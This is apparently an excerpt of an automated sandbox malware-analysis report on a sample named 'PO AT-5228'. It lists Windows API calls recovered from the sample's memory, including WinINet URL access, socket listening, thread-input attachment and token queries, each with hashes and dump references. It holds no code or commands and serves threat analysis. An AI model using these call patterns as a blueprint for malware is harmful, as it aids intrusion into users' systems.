                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: 41963ff026f2e304f19793c1454f2ec28c13a55de7f01da78a91a80193e2cc85
                                                                                        • Instruction ID: 47d5dffc9b987943a47906d811b52f72044027a8b6e543532f0db3d0ffd312a7
                                                                                        • Opcode Fuzzy Hash: 41963ff026f2e304f19793c1454f2ec28c13a55de7f01da78a91a80193e2cc85
                                                                                        • Instruction Fuzzy Hash: BC31BE31600246AFDF229F75C884FAA7BE5FF41310F1585B8EA658B1A0E731D892DB90
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00BC7CB9
                                                                                          • Part of subcall function 00BA5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA5F6F
                                                                                          • Part of subcall function 00BA5F55: GetCurrentThreadId.KERNEL32 ref: 00BA5F76
                                                                                          • Part of subcall function 00BA5F55: AttachThreadInput.USER32(00000000,?,00BA781F), ref: 00BA5F7D
                                                                                        • GetCaretPos.USER32(?), ref: 00BC7CCA
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00BC7D03
                                                                                        • GetForegroundWindow.USER32 ref: 00BC7D09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 330303fc60c8e5d1a18b177c1086d3f1258e7672d076d873d752a4ba23c2d707
                                                                                        • Instruction ID: 03e11ed3d9fbea897a5fcd0c0505b7b1521e3ee6a12d68ed3d7cf016eb162906
                                                                                        • Opcode Fuzzy Hash: 330303fc60c8e5d1a18b177c1086d3f1258e7672d076d873d752a4ba23c2d707
                                                                                        • Instruction Fuzzy Hash: 0131F171900108AFDB11EFB9D8859EFBBFDEF54314B1084AAE819E7211DA759F058FA0
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • GetCursorPos.USER32(?), ref: 00BCF211
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BDE4C0,?,?,?,?,?), ref: 00BCF226
                                                                                        • GetCursorPos.USER32(?), ref: 00BCF270
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BDE4C0,?,?,?), ref: 00BCF2A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: 6e5b348377ee55ed12a450aa3d10f52275acff6446f9af38a734ef208f9f15b6
                                                                                        • Instruction ID: aff6359b80f5b1b35ac0e3fba52de53c4e87133fb2005f0b195148306495faf7
                                                                                        • Opcode Fuzzy Hash: 6e5b348377ee55ed12a450aa3d10f52275acff6446f9af38a734ef208f9f15b6
                                                                                        • Instruction Fuzzy Hash: 22215E39600018AFCB259F94D898FFE7BF6EB49720F0880E9F9154B2A1D7719A51DB50
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BB4358
                                                                                          • Part of subcall function 00BB43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BB4401
                                                                                          • Part of subcall function 00BB43E2: InternetCloseHandle.WININET(00000000), ref: 00BB449E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 1d52dabccaa3d7b1b50f187b0656b25e1a5a0b57e3e224ddf93d92adf80ccb6f
                                                                                        • Instruction ID: 9550aa90060e89835ed96d405c66172e6c1276d0d059c96ef29ef3fa8a1d1d96
                                                                                        • Opcode Fuzzy Hash: 1d52dabccaa3d7b1b50f187b0656b25e1a5a0b57e3e224ddf93d92adf80ccb6f
                                                                                        • Instruction Fuzzy Hash: 6E218E35200605BBEB169F609C80FBBB7E9FB48710F18406ABA159B652DBF1982197A4
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BC8AA6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC8AC0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC8ACE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BC8ADC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 79bacdcdd6596523f01f9277e02f1139f2b4db5ce3d488b10e4793b634134c8a
                                                                                        • Instruction ID: 2aa52525045436ab6e246b0dfe20099bc8781f353aa649fece535a7a2b315486
                                                                                        • Opcode Fuzzy Hash: 79bacdcdd6596523f01f9277e02f1139f2b4db5ce3d488b10e4793b634134c8a
                                                                                        • Instruction Fuzzy Hash: 6B118131305511AFE705AB18DC45FBA77E9EF95320F144199F916CB2E1CFB4AD108794
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00BB8AE0
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00BB8AF2
                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00BB8AFF
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8B16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastacceptselect
                                                                                        • String ID:
                                                                                        • API String ID: 385091864-0
                                                                                        • Opcode ID: cca5ec6dbd3f9bf5d94af6ec3b78004b97cd936215218eff4597d49cc9d233d1
                                                                                        • Instruction ID: 5d4b889cb6e8d9bd626ea8661a8a7e0749245b36444a07b7e97e387acb8ef8a0
                                                                                        • Opcode Fuzzy Hash: cca5ec6dbd3f9bf5d94af6ec3b78004b97cd936215218eff4597d49cc9d233d1
                                                                                        • Instruction Fuzzy Hash: FE216671A001249FC7219F69C885ADE7BECEF5A350F0081A9F849DB251DBB4DE45CF90
                                                                                        APIs
                                                                                          • Part of subcall function 00BA1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?), ref: 00BA1E77
                                                                                          • Part of subcall function 00BA1E68: lstrcpyW.KERNEL32(00000000,?,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA1E9D
                                                                                          • Part of subcall function 00BA1E68: lstrcmpiW.KERNEL32(00000000,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?), ref: 00BA1ECE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0AD4
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0AFA
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0B2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: 3a0c70e19b8401b0881c1f014671380bf186fe1a6422cb1dc76e1ce08ffea8fb
                                                                                        • Instruction ID: 543d3676b81d7c15c7944d671f95ffe4b2b56cc3e05b03d4c65c74278db4ca95
                                                                                        • Opcode Fuzzy Hash: 3a0c70e19b8401b0881c1f014671380bf186fe1a6422cb1dc76e1ce08ffea8fb
                                                                                        • Instruction Fuzzy Hash: 4F11E636214345AFDB25AF34DC45E7A77E9FF46310F8040AAF906CB250EB719851C7A1
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00B92FB5
                                                                                          • Part of subcall function 00B8395C: __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                                                          • Part of subcall function 00B8395C: __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                                                          • Part of subcall function 00B8395C: RtlAllocateHeap.NTDLL(01920000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: dd00fa22dc173d831a34f790b8633e91dbd6f71d8f00af4b233a29fc94c41f52
                                                                                        • Instruction ID: a05ebd67a631519378a088534af6fdbd8e437973c8aafc5315ff0db82cb46945
                                                                                        • Opcode Fuzzy Hash: dd00fa22dc173d831a34f790b8633e91dbd6f71d8f00af4b233a29fc94c41f52
                                                                                        • Instruction Fuzzy Hash: 0C119132949212ABDF313F74AC8576A3BD8EF14764F3449B5F8499B161DE70C940DB90
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BA05AC
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BA05C7
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BA05DD
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00BA0632
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                        • String ID:
                                                                                        • API String ID: 3137044355-0
                                                                                        • Opcode ID: 26d85176f19782d46854954cf64790e829fbc2c285084747b6a4f55fade12bec
                                                                                        • Instruction ID: 429977e8c627f67895286860dc24054459d0e238156cc92fc44f37b21d795542
                                                                                        • Opcode Fuzzy Hash: 26d85176f19782d46854954cf64790e829fbc2c285084747b6a4f55fade12bec
                                                                                        • Instruction Fuzzy Hash: C521BE71904209EFDB20AF98EDC8ADABBF8EF41308F0084A9E51697050DBB1EA54DF51
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BA6733
                                                                                        • _memset.LIBCMT ref: 00BA6754
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00BA67A6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA67AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: 6c5ee6e06f56f309ca55fcaddb855294371718775d329d7dff738a66727679a8
                                                                                        • Instruction ID: c1eb08f913eaae3567d3bd037ef2f53f0e1cd5120e4eb22c87e3b309d4c65a2d
                                                                                        • Opcode Fuzzy Hash: 6c5ee6e06f56f309ca55fcaddb855294371718775d329d7dff738a66727679a8
                                                                                        • Instruction Fuzzy Hash: 62110AB19012287AE72067A5AC8DFABBBBCEF45764F1041DAF904E71D0D6744E80CB64
                                                                                        APIs
                                                                                          • Part of subcall function 00B9AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B9AA79
                                                                                          • Part of subcall function 00B9AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B9AA83
                                                                                          • Part of subcall function 00B9AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B9AA92
                                                                                          • Part of subcall function 00B9AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B9AA99
                                                                                          • Part of subcall function 00B9AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9AAAF
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00B9ADE4,?,?), ref: 00B9B21B
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B9B227
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B9B22E
                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 00B9B247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 4217664535-0
                                                                                        • Opcode ID: 8d92310b62e98384bd69f9475265374a759d0471238905386ad71e36874fbeea
                                                                                        • Instruction ID: 3d6d5bba76dc8193eb5922ffd8d72092f58f6b3fb88ca7394ae93ccce1fcc713
                                                                                        • Opcode Fuzzy Hash: 8d92310b62e98384bd69f9475265374a759d0471238905386ad71e36874fbeea
                                                                                        • Instruction Fuzzy Hash: 8D11C171A00205EFCF149F94ED94EAEBBE9EF85304F1480BDE9429B210D7B1AE44CB10
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00B9B498
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4AA
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4C0
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: debb5b297ca440cfb205bb922d56fdd35f3c53c78aea67b9fc9e8c1b906827a8
                                                                                        • Instruction ID: 9994aba2ba258158f1ef2fb2b9c20ae792b4a5f289387f8744a6db23b8a9fc54
                                                                                        • Opcode Fuzzy Hash: debb5b297ca440cfb205bb922d56fdd35f3c53c78aea67b9fc9e8c1b906827a8
                                                                                        • Instruction Fuzzy Hash: 4011367A900218BFDF11DBA8C981E9DBBB4FB08700F2040A1E604A7294D771AE10EB94
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B7B5A5
                                                                                        • GetClientRect.USER32(?,?), ref: 00BDE69A
                                                                                        • GetCursorPos.USER32(?), ref: 00BDE6A4
                                                                                        • ScreenToClient.USER32(?,?), ref: 00BDE6AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 0cbec2a0aed429e639fc40ae408239d9ea6857d251e64c1394f449d653db7f21
                                                                                        • Instruction ID: fbcc736864be27a211acc514c5dc3d1e7bac0cc358866918f7fedc94a4f24c83
                                                                                        • Opcode Fuzzy Hash: 0cbec2a0aed429e639fc40ae408239d9ea6857d251e64c1394f449d653db7f21
                                                                                        • Instruction Fuzzy Hash: 20112571900029BFCB14AF94D885EAE7BF8EB18304F004496F925AB140E770AA81CBA1
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BA7352
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00BA7385
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BA739B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BA73A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: 61505acd2890f0188bb706419ef683a90b3e916fd27c1c597310fa2934fd43f1
                                                                                        • Instruction ID: ee3fc413f4421b93a56f53a715e491abb4c1d3cd232209abed5376475049ad99
                                                                                        • Opcode Fuzzy Hash: 61505acd2890f0188bb706419ef683a90b3e916fd27c1c597310fa2934fd43f1
                                                                                        • Instruction Fuzzy Hash: ED110872A0C244EFCB019B68DC45B9E7BEDDB45310F144395F921E32A1DAB08D0187A5
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 7cadb5039f92e681a1e78af81e5eb5f74aa5b76e00dcf17ead0810f72b64f7d7
                                                                                        • Instruction ID: 6bb754cfbf1c85bdbd8e8f249b7df9f96931325396a2a18638e9a48423da9cfb
                                                                                        • Opcode Fuzzy Hash: 7cadb5039f92e681a1e78af81e5eb5f74aa5b76e00dcf17ead0810f72b64f7d7
                                                                                        • Instruction Fuzzy Hash: 0211C072101549BFEF124F90DC90EEABBB9FF083A5F448146FA2966150CB71DC61EBA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
